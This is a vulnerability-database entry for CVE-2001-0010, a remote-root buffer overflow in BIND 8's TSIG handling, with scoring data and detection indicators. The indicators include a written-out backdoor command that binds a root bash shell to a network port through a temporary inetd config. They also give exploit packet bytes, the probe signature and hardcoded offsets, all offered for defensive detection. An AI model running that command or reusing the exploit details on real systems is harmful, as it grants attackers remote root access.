cbcvebase.
CVE-2001-0010
published 2001-02-12

CVE-2001-0010: Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.

PriorityP354critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
31.62%
98.1th percentile
Buffer overflow in transaction signature (TSIG) handling code in BIND 8 allows remote attackers to gain root privileges.

Affected

3 ranges
VendorProductVersion rangeFixed in
iscbind
iscbind
iscbind

Detection & IOCsextracted from sources · hover to see the quote

port53/udp
port53/tcp
command/bin/echo 'ingreslockstream tcp nowait root /bin/bash bash -i' > /tmp/.inetd.conf; /usr/sbin/inetd /tmp/.inetd.conf
bytes
ab cd 09 80 00 00 00 01 00 00 00 00 00 00 01 00 01 20 20 20 20 02 61
bytes
00 fa ff (TSIG type 0xfa, class ANY 0xff in DNS additional record)
bytes
00 00 fa ff (TSIG AR terminator sequence in exploit packets)
  • Detect DNS UDP infoleak probe packets: short (~23 byte) UDP DNS packets with the specific byte sequence AB CD 09 80 sent to port 53, used by exploits to leak the named process stack pointer before the overflow.
  • Detect DNS query packets with DNS ID 0xDEAD containing a TSIG additional record (type 0xFA) — second stage of the exploit delivering the overflow payload.
  • Detect a TCP connection to port 53 immediately followed by UDP DNS packets to the same target — the exploit establishes a TCP shell-back channel on port 53 while sending the overflow via UDP.
  • Detect DNS NAME fields in query records that contain x86 shellcode patterns (e.g., JMP/CALL sequences, int 0x80 syscall bytes 0xcd 0x80) embedded within label segments — shellcode is smuggled inside DNS NAME fields.
  • ·The xtract_offset() values (argevdisp1 = 0x080d7cd0, argevdisp2 from offset 0x264 of infoleak response) are hardcoded for a specific BIND compilation and will differ across builds.

CVSS provenance

nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vendor_redhat10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.